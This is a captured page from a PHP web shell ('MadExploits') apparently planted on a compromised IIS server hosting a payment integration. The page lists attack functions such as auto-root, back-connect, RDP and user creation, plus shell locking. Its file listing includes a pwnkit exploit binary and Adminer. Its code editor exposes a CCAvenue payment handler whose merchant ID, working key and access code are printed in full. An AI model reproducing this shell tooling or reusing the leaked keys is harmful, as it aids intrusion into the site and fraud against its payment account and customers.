Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
ccav /
sec /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Crypto.php
1.32
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
banner.png
277.94
KB
-rw-rw-rw-
ccavRequestHandler.php
834
B
-rw-rw-rw-
ccavResponseHandler.php
4.42
KB
-rw-rw-rw-
config.php
121
B
-rw-rw-rw-
dataFrom.php
4.9
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
receipt.php
6.02
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ccavRequestHandler.php
<html> <head> <title> Non-Seamless-kit</title> </head> <body> <center> <?php include('Crypto.php')?> <?php error_reporting(0); $merchant_data='843957'; $working_key='5CD2F7936549FC397600AFDBB2B6F49B';//Shared by CCAVENUES $access_code='AVAR72JB46CA26RAAC';//Shared by CCAVENUES foreach ($_POST as $key => $value){ $merchant_data.=$key.'='.$value.'&'; } $encrypted_data=encrypt($merchant_data,$working_key); // Method for encrypting the data. ?> <form method="post" name="redirect" action="https://secure.ccavenue.com/transaction/transaction.do?command=initiateTransaction"> <?php echo "<input type=hidden name=encRequest value=$encrypted_data>"; echo "<input type=hidden name=access_code value=$access_code>"; ?> </form> </center> <script language='javascript'>document.redirect.submit();</script> </body> </html>
Close